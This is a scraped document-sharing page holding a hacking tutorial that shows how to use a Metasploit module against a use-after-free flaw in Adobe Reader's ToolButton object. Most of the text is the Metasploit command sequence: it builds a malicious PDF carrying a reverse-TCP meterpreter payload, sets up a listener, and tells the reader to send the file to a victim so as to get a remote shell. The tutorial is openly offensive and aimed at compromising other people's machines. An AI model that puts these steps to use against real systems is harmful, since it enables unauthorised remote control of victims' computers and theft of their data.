adobe hack

Upload: abdoulaye-aw

Post on 18-Oct-2015

10 views

Category:

Documents


0 download

DESCRIPTION

ad

TRANSCRIPT

  • Hacking Articles

    Hack Remote PC Using Adobe Reader ToolButtonUse After FreeThis module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callbackcan be used to early free the object memory. Later use of the object allows triggering the use after freecondition. This module has been tested successfully on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 onWindows XP SP3, as exploited in the wild in November, 2013Exploit TargetsWindows XP SP 3Adobe Reader 11.0.2Adobe Reader 10.1.6Adobe Reader 9.5.4RequirementAttacker: Kali LinuxVictim PC: Windows XPOpen Kali Linux terminal type msfconsole

    Now type use exploit/windows/fileformat/adobe_toolbuttonmsf exploit (adobe_toolbutton)>set payload windows/meterpreter/reverse_tcp

    http://www.hackingarticles.in/hack-remote-pc-usi...

    1 sur 3 17/12/2013 08:34

  • msf exploit (adobe_toolbutton)>set lhost 192.168.1.113 (IP of Local Host)msf exploit (adobe_toolbutton)>exploit

    After we successfully generate the malicious pdf File, it will stored on your local computer/root/.msf4/local/msf.pdf

    Now we need to set up a listener to handle reverse connection sent by victim when the exploitsuccessfully executed.use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.1.113exploitNow send your msf.pdf files to victim, as soon as they download and open it. Now you can accessmeterpreter shell on victim computer.

    http://www.hackingarticles.in/hack-remote-pc-usi...

    2 sur 3 17/12/2013 08:34

  • Google+ (/u/0/117610625427215719019?rel=author)

    http://www.hackingarticles.in/hack-remote-pc-usi...

    3 sur 3 17/12/2013 08:34